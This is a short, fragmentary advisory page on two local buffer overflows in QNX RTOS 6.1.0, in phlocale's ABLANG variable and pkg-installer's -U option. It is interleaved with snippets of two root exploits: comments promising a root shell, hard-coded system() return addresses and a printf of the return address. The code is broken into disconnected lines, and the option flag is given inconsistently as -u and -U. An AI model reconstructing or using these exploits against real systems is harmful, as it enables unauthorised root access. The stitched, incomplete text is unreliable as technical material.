[原文]Multiple buffer overflows in realtime operating system (RTOS) 6.1.0 allows local users to execute arbitrary code via (1) a long ABLANG environment variable in phlocale or (2) a long -u option to pkg-installer.
The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root.
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
* If it doesnt work for you, then you most likely need to change
* the address to system() and/or the ret.
"\x80\x95\x04\x08" //system() address
It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.
The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer.
/* Quick and dirty QNX pkg-installer root exploit.
* The shellcode sucks, it is longer than it has
* to be and you need the address to system() for
* it to work. Yes I know I'm lazy....
main(int argc, char **argv)
"\xe4\xb4\x04\x08" //system() address
printf("using ret %x\n",ret);